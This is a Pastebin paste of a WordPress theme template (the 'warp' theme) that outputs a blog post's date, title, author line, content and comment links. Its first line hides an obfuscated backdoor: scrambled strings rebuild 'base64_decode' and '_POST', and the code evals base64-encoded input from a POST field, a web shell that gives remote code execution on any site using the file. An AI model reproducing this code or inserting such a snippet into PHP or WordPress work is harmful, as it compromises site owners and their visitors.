Advertisement
Guest User

Untitled

a guest
Sep 10th, 2015
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.68 KB | None | 0 0
  1. <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nfe5857'])) {eval($s21(${$s20}['nfe5857']));}?><article id="item-<?php the_ID(); ?>" class="item" data-permalink="<?php the_permalink(); ?>">
  2.  
  3. <header>
  4.  
  5. <time datetime="<?php echo get_the_time('Y-m-d'); ?>" pubdate>
  6. <span class="day"><?php echo the_time('d'); ?></span>
  7. <span class="month"><?php echo the_time('F'); ?></span>
  8. <span class="year"><?php echo the_time('Y'); ?></span>
  9. </time>
  10.  
  11. <h1 class="title">
  12. <a href="<?php the_permalink() ?>" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a>
  13. </h1>
  14.  
  15. <p class="meta">
  16. <?php
  17. printf(__('Written by %s. Posted in %s', 'warp'), '<a href="'.get_author_posts_url(get_the_author_meta('ID')).'" title="'.get_the_author().'">'.get_the_author().'</a>', get_the_category_list(', '));
  18. ?>
  19. </p>
  20.  
  21. </header>
  22.  
  23. <div class="content clearfix"><?php the_content(''); ?></div>
  24.  
  25. <p class="links">
  26. <a href="<?php the_permalink() ?>" title="<?php the_title_attribute(); ?>"><?php _e('Continue Reading', 'warp'); ?></a>
  27. <?php comments_popup_link(__('No Comments', 'warp'), __('1 Comment', 'warp'), __('% Comments', 'warp'), "", ""); ?>
  28. </p>
  29.  
  30. <?php edit_post_link(__('Edit this post.', 'warp'), '<p class="edit">','</p>'); ?>
  31.  
  32. </article>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement